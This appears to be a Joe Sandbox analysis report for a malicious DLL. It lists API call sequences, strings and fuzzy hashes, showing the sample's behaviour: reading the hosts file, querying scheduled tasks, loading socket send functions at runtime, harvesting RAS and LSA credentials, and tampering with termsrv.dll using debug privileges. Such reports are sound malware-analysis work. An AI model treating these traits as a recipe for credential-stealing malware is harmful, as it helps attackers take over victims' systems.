                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$printfsprintfstrrchr$AttributesCloseCreateHandleModuleNameatoiisdigitmemmove
                                                  • String ID: At least one INI file in range 1 to 30 already exists.$C:\ProgramData\%d.ini$INI file path: %s
                                                  • API String ID: 584443958-3437802155
                                                  • Opcode ID: 17627fb30408fd57ff619499f816264e09329c46bd1b649663920d6fbcb07ba9
                                                  • Instruction ID: c0c76446fe8cf5dfd53c2ad47e4552eba09380e3d432d267a36c7f42f3247707
                                                  • Opcode Fuzzy Hash: 17627fb30408fd57ff619499f816264e09329c46bd1b649663920d6fbcb07ba9
                                                  • Instruction Fuzzy Hash: 614146761043141BE324E7789C85BEB37D8FB84324F040E2DFA59971D0EBB5E68883A2
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 10029574
                                                  • GetCurrentProcess.KERNEL32(?), ref: 1002957F
                                                  • IsWow64Process.KERNEL32(00000000), ref: 10029586
                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 100295D1
                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000000,00000000), ref: 100295EB
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 100295FB
                                                  • LocalAlloc.KERNEL32(00000040,00000002), ref: 10029609
                                                  • ReadFile.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 1002961E
                                                  • LocalFree.KERNEL32(00000000), ref: 10029629
                                                  • CloseHandle.KERNEL32(00000000), ref: 10029630
                                                  • CloseHandle.KERNEL32(00000000), ref: 10029641
                                                  • LocalSize.KERNEL32(00000000), ref: 1002964B
                                                  • LocalFree.KERNEL32(00000000), ref: 1002965D
                                                  Strings
                                                  • \sysnative\drivers\etc\hosts, xrefs: 10029596
                                                  • \system32\drivers\etc\hosts, xrefs: 1002959D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileLocal$CloseFreeHandleProcessSize$AllocAttributesCreateCurrentDirectoryReadWindowsWow64
                                                  • String ID: \sysnative\drivers\etc\hosts$\system32\drivers\etc\hosts
                                                  • API String ID: 2528494210-1011561390
                                                  • Opcode ID: 054d26be596b902fa95bae9bce00a87ca9b2867d96e29c3ff1e8a0496d31c0d7
                                                  • Instruction ID: d5adc3ae6ecb6841eeb3fa0ff141ec478325443b7579d493578cb5101da691f6
                                                  • Opcode Fuzzy Hash: 054d26be596b902fa95bae9bce00a87ca9b2867d96e29c3ff1e8a0496d31c0d7
                                                  • Instruction Fuzzy Hash: 7331E4352002106FE3159F78DC89FEB77A8FB88320F144B29FA5A922D0DAB499098765
                                                  APIs
                                                  • CreatePipe.KERNEL32 ref: 10020A72
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,00000044,?), ref: 10020AED
                                                  • CloseHandle.KERNEL32(?), ref: 10020AFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseHandlePipeProcess
                                                  • String ID: D$schtasks /Query /TN MM
                                                  • API String ID: 1262542551-2635328053
                                                  • Opcode ID: a5ddbd22c73d49735de37707cb875a3f661527166062486b8fd150345d17fcb8
                                                  • Instruction ID: 0981537ea3ed7163310ddf7b13f575be98c0f6f7661eef0bbbfb29fdb67919c4
                                                  • Opcode Fuzzy Hash: a5ddbd22c73d49735de37707cb875a3f661527166062486b8fd150345d17fcb8
                                                  • Instruction Fuzzy Hash: A851DF75604351AFD721CF28C884AEFBBE6FB88744F944A1EF98987240D77599048B92
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10012641
                                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 10012651
                                                  • wsprintfA.USER32 ref: 10012683
                                                  • CloseHandle.KERNEL32(00000000), ref: 100126D7
                                                  • Sleep.KERNEL32(00000002), ref: 100126F1
                                                  • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10012730
                                                  • GetProcAddress.KERNEL32(00000000,send), ref: 1001273C
                                                  • FreeLibrary.KERNEL32(?), ref: 10012794
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressLoadProc$CloseFreeHandleSleepwsprintf
                                                  • String ID: ID= %d $closesocket$send$ws2_32.dll$Wu
                                                  • API String ID: 1680113600-3344951271
                                                  • Opcode ID: 1e004e0467ac5dc5021d6473d21da3e49f18c438dae7c27dbc7de7b95a398db1
                                                  • Instruction ID: c6c0da67d46d13d68f268ba758adfad6d1a8e6a04e0d0a6cfae2b139a2cc5429
                                                  • Opcode Fuzzy Hash: 1e004e0467ac5dc5021d6473d21da3e49f18c438dae7c27dbc7de7b95a398db1
                                                  • Instruction Fuzzy Hash: 5941B3B9608355AFD714DF78CC88B9BB7E4FB88344F040A18F985DB281D774E9608B61
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: getenv
                                                  • String ID: JSIMD_FORCE3DNOW$JSIMD_FORCEAVX2$JSIMD_FORCEMMX$JSIMD_FORCENONE$JSIMD_FORCESSE$JSIMD_FORCESSE2$JSIMD_NOHUFFENC
                                                  • API String ID: 498649692-40509672
                                                  • Opcode ID: 61b2c6428c2de1600953aa50287c5fc1a017f9c2394c6be7f3d5de403615fe6d
                                                  • Instruction ID: 1292ee3b40c95aece04a650f8e7d07c75e6783a970d692f9490819dafc268f4a
                                                  • Opcode Fuzzy Hash: 61b2c6428c2de1600953aa50287c5fc1a017f9c2394c6be7f3d5de403615fe6d
                                                  • Instruction Fuzzy Hash: 0F2129EBA201152FF751E2317D4A76531C1F7A13E2F9A8231E805DF2C6FA18DD469392
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 10005AA7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005AAE
                                                    • Part of subcall function 10005310: LoadLibraryA.KERNEL32(kernel32.dll,FreeLibrary,?,L$_RasDefaultCredentials#0,00000000), ref: 1000532C
                                                    • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 10005335
                                                    • Part of subcall function 10005310: LoadLibraryA.KERNEL32 ref: 10005386
                                                    • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 10005389
                                                    • Part of subcall function 10005310: LoadLibraryA.KERNEL32(?,IsValidSid), ref: 10005397
                                                    • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 1000539A
                                                  • wsprintfA.USER32 ref: 10005B17
                                                    • Part of subcall function 100058B0: LoadLibraryA.KERNEL32 ref: 1000590A
                                                    • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005913
                                                    • Part of subcall function 100058B0: LoadLibraryA.KERNEL32(?,LsaOpenPolicy), ref: 10005923
                                                    • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005926
                                                    • Part of subcall function 100058B0: LoadLibraryA.KERNEL32(?,LsaClose), ref: 10005934
                                                    • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005937
                                                    • Part of subcall function 10005B80: LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,00000000,00000000), ref: 10005B96
                                                    • Part of subcall function 10005B80: GetProcAddress.KERNEL32(00000000), ref: 10005B9D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$wsprintf
                                                  • String ID: .$2$3$D$I$L$_RasDefaultCredentials#0$LsaFreeMemory$P$RasDialParams!%s#0$V$d
                                                  • API String ID: 2290142023-608447665
                                                  • Opcode ID: ce02f7ea02b34bf1def763f01addefc66c280edfd5cd4819a27cc4b3bb6cd685
                                                  • Instruction ID: 4c1d29f0bd828654cd513fdf21a7457cee7c04ca4083380b940b1afa8f540c18
                                                  • Opcode Fuzzy Hash: ce02f7ea02b34bf1def763f01addefc66c280edfd5cd4819a27cc4b3bb6cd685
                                                  • Instruction Fuzzy Hash: 123105751083809FE301CF68C894A6BBBE9AF99B04F44495CF5C987342D775E90CCBA6
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 1000105A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001061
                                                  • #823.MFC42(000003E8), ref: 1000109D
                                                  • #823.MFC42(00000020,000003E8), ref: 100010A7
                                                  • #823.MFC42(000003E8,00000020,000003E8), ref: 100010B2
                                                  • #823.MFC42(00000020,000003E8,00000020,000003E8), ref: 100010BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823$AddressLibraryLoadProc
                                                  • String ID: A$C$E$KERNEL32.dll$a$n$r$v
                                                  • API String ID: 4155842574-2549505875
                                                  • Opcode ID: a16daf83469977fc098d6e9d6d2204c32631686849e5759c66df8540c12cc638
                                                  • Instruction ID: d4cdf86d6ce510d6661d11d19ce4d48ee2c343f99e241af99f0dca74e59b5833
                                                  • Opcode Fuzzy Hash: a16daf83469977fc098d6e9d6d2204c32631686849e5759c66df8540c12cc638
                                                  • Instruction Fuzzy Hash: 9E317CB04087819ED310CF69D844647FBE8FF59308F44495EE1C987712D7B9E648CBAA
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 10027190
                                                  • lstrcatA.KERNEL32(?,\termsrv.dll), ref: 100271A0
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                    • Part of subcall function 100270F0: CreateToolhelp32Snapshot.KERNEL32 ref: 10027105
                                                    • Part of subcall function 100270F0: Process32First.KERNEL32(00000000,?), ref: 10027112
                                                    • Part of subcall function 100270F0: Process32Next.KERNEL32(00000000,?), ref: 10027150
                                                    • Part of subcall function 100270F0: CloseHandle.KERNEL32(00000000,00000000,?), ref: 1002715B
                                                    • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                    • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                    • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                    • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                    • Part of subcall function 1001B690: CloseHandle.KERNEL32(?,?,00000000,?,00000010,00000000,00000000), ref: 1001B710
                                                  • GetProcessId.KERNEL32(csrss.exe,?,?,?,00000065,?,?,\termsrv.dll), ref: 100271E9
                                                  • AbortSystemShutdownA.ADVAPI32(00000000), ref: 100271F9
                                                  • GetProcessId.KERNEL32(drwtsn32.exe,?,75570F00,?,?,?,00000065,?,?,\termsrv.dll), ref: 10027212
                                                  • EnumWindows.USER32(10026EF0,00000000), ref: 10027222
                                                  • EnumWindows.USER32(10026EF0,00000000), ref: 1002722A
                                                  • Sleep.KERNEL32(0000000A,?,75570F00,?,?,?,00000065,?,?,\termsrv.dll), ref: 1002722E
                                                  • AbortSystemShutdownA.ADVAPI32(00000000), ref: 10027232
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleSystem$AbortEnumProcess32ShutdownTokenWindows$AdjustCreateCurrentDirectoryErrorFirstLastLookupNextOpenPrivilegePrivilegesSleepSnapshotToolhelp32Valuelstrcat
                                                  • String ID: SeDebugPrivilege$SeShutdownPrivilege$\termsrv.dll$csrss.exe$drwtsn32.exe
                                                  • API String ID: 1044539573-3630850118
                                                  • Opcode ID: 6c9e992c0fc163b916cdfcc23b81b9a1f1acd26940f59c35f2752ab5a36c769a
                                                  • Instruction ID: 339130026bb2bf0d2d1701da694e5a8bd89523d213cb69a03697529ac0af6141
                                                  • Opcode Fuzzy Hash: 6c9e992c0fc163b916cdfcc23b81b9a1f1acd26940f59c35f2752ab5a36c769a
                                                  • Instruction Fuzzy Hash: 5E11E57D600309BBF710E7B4AC86FDA3658FB58784F840424FB08990D2EB79F8848676
                                                  APIs
                                                  • #823.MFC42(0000001C,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006540
                                                  • #825.MFC42(00000000,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006583
                                                  • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006597
                                                  • #825.MFC42(00000000,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100065DD
                                                  • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100065F1
                                                  • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006637
                                                  • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 1000664B
                                                  • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006691
                                                  • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066A5
                                                  • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066EB
                                                  • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066FF
                                                  • #825.MFC42(?,?,?), ref: 10006758
                                                  • #823.MFC42(?,?,?), ref: 1000676C
                                                  • #825.MFC42(00000000,?,?), ref: 100067B1
                                                  • #823.MFC42(?,?,?), ref: 100067C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823$#825
                                                  • String ID:
                                                  • API String ID: 2704444950-0
                                                  • Opcode ID: 7bec8dbf16562bad003da3af1f42c1a03097033c04e808ff0bba191b4fb42cb9
                                                  • Instruction ID: 60a5b56d8eae0c97300d1150149c5d3cd1187e5e90251027326246755cc62438
                                                  • Opcode Fuzzy Hash: 7bec8dbf16562bad003da3af1f42c1a03097033c04e808ff0bba191b4fb42cb9
                                                  • Instruction Fuzzy Hash: 0BC1D0B57046054BEB18CE38D89292B77D2EF982A0B65863CFD1A877C5DF71ED058780
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,MultiByteToWideChar,00000000,?,0000005C,?,1000620E,00000000), ref: 10006416
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000641F
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,0000005C,?,1000620E,00000000), ref: 1000642F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10006432
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA,?,0000005C,?,1000620E,00000000), ref: 10006442
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10006445
                                                  • #823.MFC42(00000002,?,0000005C,?,1000620E,00000000), ref: 10006461
                                                  • #823.MFC42(00000002,00000002,?,0000005C,?,1000620E,00000000), ref: 10006469
                                                  • #825.MFC42(00000000,?,0000005C,?,1000620E,00000000), ref: 10006495
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$#823$#825
                                                  • String ID: KERNEL32.dll$MultiByteToWideChar$WideCharToMultiByte$lstrlenA
                                                  • API String ID: 1309867234-4059950253
                                                  • Opcode ID: 5afda445d53fb012d2fd93e3f1f0fcc127a204d4534de600f34ff66f53386706
                                                  • Instruction ID: d38de5e7d733c2c0227049bdb78a0ea508dceebb21622f4ca20d5dfa4cfc4dbc
                                                  • Opcode Fuzzy Hash: 5afda445d53fb012d2fd93e3f1f0fcc127a204d4534de600f34ff66f53386706
                                                  • Instruction Fuzzy Hash: 2E1106B694131837DA20A7B56C49F9B3E9CDF967B1F15052AFB00B7181D964A804C6F2
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(?,?,?,?,00000010), ref: 1002BD4B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002BD52
                                                    • Part of subcall function 1002BFA0: LoadLibraryA.KERNEL32(USER32.dll,OpenDesktopA,?,?,00000000,1002BD69,00000000), ref: 1002BFBB
                                                    • Part of subcall function 1002BFA0: GetProcAddress.KERNEL32(00000000), ref: 1002BFC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
